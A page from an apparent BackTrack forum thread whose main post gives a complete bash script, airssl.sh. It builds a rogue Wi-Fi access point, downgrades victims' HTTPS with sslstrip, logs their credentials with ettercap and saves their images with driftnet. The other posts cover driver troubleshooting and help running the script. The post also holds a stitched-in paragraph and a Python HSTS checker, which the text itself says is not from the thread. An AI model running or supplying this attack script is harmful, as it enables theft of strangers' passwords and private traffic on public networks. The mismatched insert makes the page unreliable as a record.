Page 6 of 9
Results 51 to 60 of 88

Thread: NEW SCRIPT Capturing Passwords With sslstrip AIRSSL.sh

  1. #51
    Member
    Join Date
    Feb 2010
    Location
    MTI3LjAuMC4x
    Posts
    90

    Default Re: NEW SCRIPT Capturing Passwords With sslstrip AIRSSL.sh

    I still don't have DHCP working, but I did hack this script up a bit as well. Hope you like my modifications.

    The biggest thing I wanted to add was a --cleanup process so that it no longer messed things up for me while trying to troubleshoot the DHCP issue. I assume my problem is something with my wireless drivers and injection, even if it works elsewhere. Don't know yet.

    Code:
    #!/bin/bash
    # (C)opyright 2009 - killadaninja - Modified G60Jon 2010 - SpudGunMan 2010
    # airssl.sh - v1.2
    # visit the man page NEW SCRIPT Capturing Passwords With sslstrip AIRSSL.sh
    ## set the subnet for DHCP handed out to the FAKEAP Wireless CLients
    fakeAPnet=10.0.0.0 #network for dhcp
    fakeAPSubnetMask=255.255.255.0 #subnet for dhcp
    fakeAPat0Address=10.0.0.1 #the interface address and gateway for the fakeAP dhcp
    fakeAPdns=8.8.8.8 #a valid DNS server
    fakeAPrange="10.0.0.20 10.0.0.50" #string for the range
    
    CleanUp ()
    {
    echo
    echo "[+] Cleaning up airssl and resetting iptables..."
    kill ${fakeapid}
    kill ${dchpid}
    kill ${sslstripid}
    kill ${ettercapid}
    kill ${dritnetid}
    kill ${sslstriplogid}
    airmon-ng stop $fakeap_interface
    airmon-ng stop $fakeap
    echo "0" > /proc/sys/net/ipv4/ip_forward
    iptables --flush
    iptables --table nat --flush
    iptables --delete-chain
    iptables --table nat --delete-chain
    
    echo "[+] Check if clean up successful..."
    echo "[+] Thank you for using airssl, Good Bye..."
    rm -f airssl-cleanup
    exit
    }
    
    initalize(){
    # Network questions
    echo
    echo "===========Internet Connection Information========="
    route -n -A inet | grep UG
    echo "====Airmon Check Output (Should be no errors)======"
    airmon-ng check
    echo "====Airmon Output (FakeAP Wireless Interface)======"
    airmon-ng
    echo
    echo
    read -r -p "Enter Default gateway IP address, this is listed above. example 192.168.1.254: " gatewayip
    read -r -p "Enter interface connected to the internet, this is listed above. example wlan0: " internet_interface
    read -r -p "Enter your interface to be used for the fake AP, for example wlan1: " fakeap_interface
    fakeap=$fakeap_interface
    read -r -p "Enter the ESSID you would like your rogue AP to be called: " ESSID
    airmon-ng start $fakeap_interface
    read -r -p "Enter interface for fake AP, after airmon-ng processing example mon0: " fakeap_interface
    }
    # Clean up command line
    if [ "$1" = "--cleanup" ] ; then
    echo "[+] Previous Job Settings will be used"
    . airssl-cleanup
    CleanUp
    elif [ "$1" != "" ]; then
    echo
    echo "Fake AP with SSL Strip"
    echo "to cleanup last job run airssl.sh --cleanup"
    exit
    else
    echo "Fake AP - SSL Strip"
    fi
    initalize
    echo
    echo "Default/Networks Gateway: "$gatewayip
    echo "Default/Networks Gateway Interface: "$internet_interface
    echo "FakeAP ESSID: "$ESSID
    echo "FakeAP Fake Interface: "$fakeap_interface
    echo
    echo 
    read -r -n 1 -p "Is this information correct? (y/n)" ANSWER
    if [ $ANSWER = "y" ] ; then
    echo "[+] Settings will be used"
    else
    echo "[+] airmon cleanup"
    airmon-ng stop $fakeap_interface
    initalize
    fi
    
    # Dhcpd creation
    mkdir -p "/pentest/wireless/airssl"
    echo "authoritative;
    
    default-lease-time 600;
    max-lease-time 7200;
    
    subnet $fakeAPnet netmask $fakeAPSubnetMask {
    option routers $fakeAPat0Address;
    option subnet-mask $fakeAPSubnetMask;
    
    option domain-name "\"$ESSID\"";
    option domain-name-servers $fakeAPdns;
    
    range $fakeAPrange;
    
    }" > /pentest/wireless/airssl/dhcpd.conf
    
    # Fake ap setup
    echo "[+] Configuring FakeAP...."
    read -r -n 1 -p "Airbase-ng will run in its most basic mode, would you like to
    configure any extra switches, would you like Airbase to clone ALL probe requests
    choose n if your are unsure... y or n or (a)All?" ANSWER
    
    if [ $ANSWER = "y" ] ; then
    airbase-ng --help
    echo
    echo -n "Enter switches, note you have already chosen an ESSID -e this cannot be 
    redefined, also in this mode you MUST define a channel "
    read -e aswitch
    echo
    echo "[+] Starting FakeAP..."
    xterm -geometry 75x15+1+0 -T "FakeAP - $fakeap - $fakeap_interface" -e airbase-ng "$aswitch" -e "$ESSID" $fakeap_interface & fakeapid=$!
    sleep 2
    fi
    
    if [ $ANSWER = "a" ] ; then
    echo
    echo "[+] Starting FakeAP..."
    xterm -geometry 75x15+1+0 -T "FakeAP - $fakeap - $fakeap_interface" -e airbase-ng -P -C 30 $fakeap_interface & fakeapid=$!
    sleep 2
    fi
    
    if [ $ANSWER = "n" ] ; then
    echo
    echo "[+] Starting FakeAP..."
    xterm -geometry 75x15+1+0 -T "FakeAP - $fakeap - $fakeap_interface" -e airbase-ng -c 1 -e "$ESSID" $fakeap_interface & fakeapid=$!
    sleep 2
    fi
    
    # Tables
    echo "[+] Configuring interface and clear tables..."
    ifconfig lo up
    ifconfig at0 up &
    sleep 1
    ifconfig at0 $fakeAPat0Address netmask $fakeAPSubnetMask
    ifconfig at0 mtu 1400
    route add -net $fakeAPnet netmask $fakeAPSubnetMask gw $fakeAPat0Address
    iptables --flush
    iptables --table nat --flush
    iptables --delete-chain
    iptables --table nat --delete-chain
    echo 1 > /proc/sys/net/ipv4/ip_forward
    sleep 10
    
    # DHCP
    echo "[+] Setting up DHCP..."
    touch /var/run/dhcpd.pid
    chown dhcpd:dhcpd /var/run/dhcpd.pid
    xterm -geometry 75x20+1+100 -T DHCP -e dhcpd3 -d -f -cf "/pentest/wireless/airssl/dhcpd.conf" at0 & dchpid=$!
    sleep 3
    
    # Sslstrip
    echo "[+] Configuring sslstrip..."
    read -r -n 1 -p "Would you like to Start SSLstrip?, y or n " STRIP
    echo
    if [ $STRIP = "y" ] ; then
    echo "[+] Configuring iptables for sslstrip..."
    iptables -t nat -A PREROUTING -p udp -j DNAT --to $gatewayip
    iptables -P FORWARD ACCEPT
    iptables --append FORWARD --in-interface at0 -j ACCEPT
    iptables --table nat --append POSTROUTING --out-interface $internet_interface -j MASQUERADE
    iptables -t nat -A PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-port 10000
    echo "[+] Starting sslstrip..."
    xterm -geometry 75x15+1+200 -T sslstrip -e sslstrip -f -p -k 10000 & sslstripid=$!
    sleep 2
    else
    echo "[+] Configuring iptables without sslstrip..."
    iptables -X
    iptables -F
    iptables -A FORWARD -i at0 -o $internet_interface -m state --state NEW -j ACCEPT
    iptables -A FORWARD -m state --state ESTABLISHED,RELATED -j ACCEPT
    iptables -A POSTROUTING -t nat -j MASQUERADE
    fi
    
    # Ettercap
    echo "[+] Configuring ettercap..."
    echo
    read -r -n 1 -p "Ettercap will run in its most basic mode, would you like to
    configure any extra switches for example to load plugins or filters,
    (advanced users only), if you are unsure choose n, y or n " ETTER
    if [ $ETTER = "y" ] ; then
    ettercap --help
    fi
    
    if [ $ETTER = "y" ] ; then
    echo -n "Interface type is set you CANNOT use "\"interface type\"" switches here
    For the sake of airssl, ettercap WILL USE -u and -p so you are advised
    NOT to use -M, also -i is already set and CANNOT be redefined here. 
    Ettercaps output will be saved to /pentest/wireless/airssl/passwords
    DO NOT use the -w switch, also if you enter no switches here ettercap will fail "
    echo
    read "eswitch"
    echo "[+] Starting ettercap..."
    xterm -geometry 73x25+1+300 -T ettercap -s -sb -si +sk -sl 5000 -e ettercap -p -u "$eswitch" -T -q -i at0 & ettercapid=$!
    sleep 1
    fi
    
    if [ $ETTER = "n" ] ; then
    echo
    echo "[+] Starting ettercap..."
    xterm -geometry 73x25+1+300 -T ettercap -s -sb -si +sk -sl 5000 -e ettercap -p -u -T -q -w /pentest/wireless/airssl/passwords -i at0 & ettercapid=$!
    sleep 1
    fi
    
    # Driftnet
    echo
    echo "[+] Driftnet?"
    echo
    read -r -n 1 -p "Would you also like to start driftnet to capture the victims images,
    (this may make the network a little slower), y or n " DRIFT
    
    if [ $DRIFT = "y" ] ; then
    mkdir -p "/pentest/wireless/airssl/driftnetdata"
    echo "[+] Starting driftnet..."
    driftnet -i $internet_interface -p -d /pentest/wireless/airssl/driftnetdata & dritnetid=$!
    sleep 3
    fi
    
    
    if [ $STRIP = "y" ] ; then
    echo "[+] Starting sslstrip logging..."
    xterm -geometry 75x15+1+600 -T SSLStrip-Log -e tail -f sslstrip.log & sslstriplogid=$!
    sleep 2
    fi
    
    
    clear
    echo
    echo "[+] Activated..."
    echo "Airssl is now running, after victim connects and surfs their credentials 
    will be displayed in ettercap. You may use right/left mouse buttons 
    to scroll up/down ettercaps xterm shell, ettercap will also save its output 
    to /pentest/wireless/airssl/passwords unless you stated otherwise. 
    Driftnet images will be saved to /pentest/wireless/airssl/driftnetdata "
    echo
    echo "[+] IMPORTANT..."
    echo
    echo "After you have finished please close airssl and clean up properly by hitting y"
    echo "if airssl is not cleaned up properly ERRORS WILL OCCUR"
    echo "otherwise you can clean up later with the airssl --cleanup command"
    read -r -n 1 -p "(press y to cleanup now)" WISH
    
    # Clean up
    if [ "$WISH" = "y" ] ; then
    CleanUp
    else
    save=$'\n'
    echo -n "#cleanup process information"$'\n' > airssl-cleanup
    echo -n "fakeapid="$fakeapid$'\n' >> airssl-cleanup
    echo -n "dchpid="$dchpid$'\n' >> airssl-cleanup
    echo -n "sslstripid="$sslstripid$'\n' >> airssl-cleanup
    echo -n "ettercapid="$ettercapid$'\n' >> airssl-cleanup
    echo -n "dritnetid="$dritnetid$'\n' >> airssl-cleanup
    echo -n "sslstriplogid="$sslstriplogid$'\n' >> airssl-cleanup
    echo -n "fakeap_interface="$fakeap_interface$'\n' >> airssl-cleanup
    echo -n "fakeap="$fakeap$'\n' >> airssl-cleanup
    fi
    
    exit
    Last edited by spudgunman; 11-15-2010 at 06:51 PM. Reason: fix typo
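    The script above works because the iptables REDIRECT rule sends every client request for TCP port 80 to sslstrip, so a browser that starts on http:// never gets its https:// links back. The server-side answer to that downgrade is HTTP Strict Transport Security (RFC 6797). The checker below is an added example for defenders, not code from the thread or from airssl: it grades the Strict-Transport-Security header of an HTTPS response, and the three sample header sets are constructed for the example.

```python
import re
from dataclasses import dataclass, field

ONE_YEAR = 31536000  # seconds; the usual floor for a policy that outlives one visit

@dataclass
class HstsVerdict:
    present: bool
    max_age: int
    include_subdomains: bool
    preload: bool
    findings: list = field(default_factory=list)

def parse_hsts(value):
    """Parse a Strict-Transport-Security value into (max_age, includeSubDomains, preload).
    Directive names are case-insensitive (RFC 6797); max_age None means the header is invalid."""
    max_age, include_sub, preload = None, False, False
    for directive in value.split(";"):
        name, _, val = directive.strip().partition("=")
        name = name.strip().lower()
        if name == "max-age":
            m = re.fullmatch(r'"?(\d+)"?', val.strip())  # the value may be quoted
            if m:
                max_age = int(m.group(1))
        elif name == "includesubdomains":
            include_sub = True
        elif name == "preload":
            preload = True
    return max_age, include_sub, preload

def evaluate_hsts(headers):
    """Grade the HSTS policy found in a dict of HTTPS response headers (any key case)."""
    value = next((v for k, v in headers.items()
                  if k.lower() == "strict-transport-security"), None)
    if value is None:
        return HstsVerdict(False, 0, False, False,
                           ["no HSTS header: any visit that starts on http:// can be stripped"])
    max_age, sub, pre = parse_hsts(value)
    verdict = HstsVerdict(True, max_age or 0, sub, pre)
    if max_age is None:
        verdict.findings.append("max-age missing: header is invalid and ignored by browsers")
    elif max_age == 0:
        verdict.findings.append("max-age=0 clears any stored policy")
    elif max_age < ONE_YEAR:
        verdict.findings.append("max-age under one year: policy lapses between visits")
    if not sub:
        verdict.findings.append("no includeSubDomains: subdomains can still be stripped")
    if not pre:
        verdict.findings.append("no preload: the very first visit is unprotected")
    return verdict

# Constructed sample header sets for the example (not captured from any real site).
SAMPLE_GOOD = {"Strict-Transport-Security": "max-age=63072000; includeSubDomains; preload"}
SAMPLE_WEAK = {"strict-transport-security": "max-age=300"}
SAMPLE_NONE = {"Content-Type": "text/html"}
```

    A policy only protects a browser that has already seen it over HTTPS, which is why the preload finding matters for the first connection through a rogue AP.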

  2. #52
    Just burned his ISO
    Join Date
    Nov 2010
    Posts
    3

    Default Re: NEW SCRIPT Capturing Passwords With sslstrip AIRSSL.sh

    Just tested your version of the script and DHCP seems to work fine on my test hardware. I will give the whole script a try and see if it's easier to work with than my current one.

    J

  3. #53
    Member
    Join Date
    Feb 2010
    Location
    MTI3LjAuMC4x
    Posts
    90

    Default Re: NEW SCRIPT Capturing Passwords With sslstrip AIRSSL.sh

    Can I ask what wireless card/drivers you use? I have found info along these lines (Debian User Forums topic "ath5k droping packets") that indicates it's just my wireless drivers that are causing the failure.

  4. #54
    Just burned his ISO
    Join Date
    Nov 2010
    Posts
    3

    Default Re: NEW SCRIPT Capturing Passwords With sslstrip AIRSSL.sh

    Working on a Dell Latitude D420.

    Got the following internal interfaces; I use these to connect to the internet:
    iwl3945: Intel(R) PRO/Wireless 3945ABG/BG - Internal Wireless
    Tigon3 [partno(BCM5752KFBG) rev 6002] (PCI Express) - Internal Wired LAN

    Then I have the following PC-Cards (use these for scanning/injection):

    • Netgear WG511T - Atheros chipset
    • Generic PCMCIA wireless card I have had for years, no idea what it is though. dmesg shows the
      following on insertion for the 2 cards:


    Code:
    pcmcia_socket pcmcia_socket0: pccard: CardBus card inserted into slot 0
    pci 0000:03:00.0: reg 10: [mem 0x00000000-0x00001fff]
    pci 0000:03:00.0: supports D1 D2
    pci 0000:03:00.0: PME# supported from D0 D1 D2 D3hot D3cold
    pci 0000:03:00.0: PME# disabled
    pci 0000:03:00.0: BAR 0: assigned [mem 0x68000000-0x68001fff]
    pci 0000:03:00.0: BAR 0: set to [mem 0x68000000-0x68001fff] (PCI address [0x68000000-0x68001fff]
    p54pci 0000:03:00.0: enabling device (0000 -> 0002)
    p54pci 0000:03:00.0: PCI INT A -> GSI 19 (level, low) -> IRQ 19
    p54pci 0000:03:00.0: setting latency timer to 64
    p54pci 0000:03:00.0: firmware: requesting isl3886pci
    phy3: p54 detected a LM86 firmware
    p54: rx_mtu reduced from 3240 to 2376
    phy3: FW rev 2.13.12.0 - Softmac protocol 5.9
    phy3: cryptographic accelerator WEP:YES, TKIP:YES, CCMP:YES
    phy3: hwaddr 00:e0:98:b4:2b:3b, MAC:isl3890 RF:Frisbee
    phy3: Selected rate control algorithm 'minstrel'
    Registered led device: p54-phy3::assoc
    Registered led device: p54-phy3::tx
    Registered led device: p54-phy3::rx
    Registered led device: p54-phy3::radio
    p54pci 0000:03:00.0: is registered as 'phy3'
    Code:
    pcmcia_socket pcmcia_socket0: pccard: CardBus card inserted into slot 0
    pci 0000:03:00.0: reg 10: [mem 0x00000000-0x0000ffff]
    pci 0000:03:00.0: BAR 0: assigned [mem 0x68000000-0x6800ffff]
    pci 0000:03:00.0: BAR 0: set to [mem 0x68000000-0x6800ffff] (PCI address [0x68000000-0x6800ffff]
    ath5k 0000:03:00.0: enabling device (0000 -> 0002)
    ath5k 0000:03:00.0: PCI INT A -> GSI 19 (level, low) -> IRQ 19
    ath5k 0000:03:00.0: registered as 'phy4'
    ath: EEPROM regdomain: 0x0
    ath: EEPROM indicates default country code should be used
    ath: doing EEPROM country->regdmn map search
    ath: country maps to regdmn code: 0x3a
    ath: Country alpha2 being used: US
    ath: Regpair used: 0x3a
    phy4: Selected rate control algorithm 'minstrel'
    ath5k phy4: Atheros AR5212 chip found (MAC: 0x56, PHY: 0x41)
    ath5k phy4: RF2112B 2GHz radio found (0x46)
    cfg80211: Calling CRDA for country: US
    cfg80211: Regulatory domain changed to country: US
        (start_freq - end_freq @ bandwidth), (max_antenna_gain, max_eirp)
        (2402000 KHz - 2472000 KHz @ 40000 KHz), (300 mBi, 2700 mBm)
        (5170000 KHz - 5250000 KHz @ 40000 KHz), (300 mBi, 1700 mBm)
        (5250000 KHz - 5330000 KHz @ 40000 KHz), (300 mBi, 2000 mBm)
        (5490000 KHz - 5710000 KHz @ 40000 KHz), (300 mBi, 2000 mBm)
        (5735000 KHz - 5835000 KHz @ 40000 KHz), (300 mBi, 3000 mBm)

  5. #55
    Very good friend of the forum (killadaninja)
    Join Date
    Oct 2007
    Location
    London, United Kingdom.
    Posts
    526

    Default Re: NEW SCRIPT Capturing Passwords With sslstrip AIRSSL.sh

    Update g60jon, and all. I have been trying for a while to get the r8187 driver to work properly when responding to all probes, but it created numerous other problems; in the end I decided the rtl8187 driver should be used. After coming to this thread to edit a few things and grab the script, it appears g60jon had done pretty much what I wanted to do to the script (which has been turned into airssl 2.0). Airssl 2.0 now uses rtl8187, which has added the use of responding to all probes "properly"; the tutorial and script have been updated, and I have noted you, g60jon.
    Sometimes I try to fit a 16-character string into an 8–byte space, on purpose.

  6. #56
    Just burned his ISO
    Join Date
    Feb 2010
    Posts
    9

    Default Re: NEW SCRIPT Capturing Passwords With sslstrip AIRSSL.sh

    Hello GuyZ! I am trying to make the script by copying it and pasting it in Notepad, but I am getting errors and "command not found"... I am sure that I made a mistake in some line, but I can't get it working...
    Can someone upload the working script somewhere, so I can download it?

    Thanks in advance!

  7. #57
    Administrator (sickness)
    Join Date
    Jan 2010
    Location
    Behind the screen.
    Posts
    2,921

    Default Re: NEW SCRIPT Capturing Passwords With sslstrip AIRSSL.sh

    Quote Originally Posted by miata:
    Hello GuyZ! I am trying to make the script by copying it and pasting it in Notepad, but I am getting errors and "command not found"... I am sure that I made a mistake in some line, but I can't get it working...
    Can someone upload the working script somewhere, so I can download it?

    Thanks in advance!
    Notepad? I think you should first get some basic knowledge, then learn what the script actually does before you start playing with these things.
    Back|track giving machine guns to monkeys since 2007 !

    Do not read the Wiki, most your questions will not be answered there !
    Do not take a look at the: Forum Rules !

  8. #58
    Just burned his ISO
    Join Date
    Feb 2010
    Posts
    9

    Default Re: NEW SCRIPT Capturing Passwords With sslstrip AIRSSL.sh

    On my Windows machine (the one I am typing on now), I paste the script into Notepad, then rename it to airssl.sh and then copy it to my Eee PC running BT4 R2 live.
    All I'd like (if possible) is the airssl.sh file, to find out what I am doing wrong! (chmod is done.)

    Thanks!

  9. #59
    Administrator (sickness)
    Join Date
    Jan 2010
    Location
    Behind the screen.
    Posts
    2,921

    Default Re: NEW SCRIPT Capturing Passwords With sslstrip AIRSSL.sh

    The script is in the second post, also without an exact error message no one will be able to help you.
    Back|track giving machine guns to monkeys since 2007 !

    Do not read the Wiki, most your questions will not be answered there !
    Do not take a look at the: Forum Rules !

  10. #60
    Just burned his ISO
    Join Date
    Feb 2010
    Posts
    9

    Default Re: NEW SCRIPT Capturing Passwords With sslstrip AIRSSL.sh

    Got it working!

    In BackTrack, I made a new text file and pasted the script from the one I made with Notepad. It worked, although I couldn't find any difference...
    Thanks and sorry for nagging!
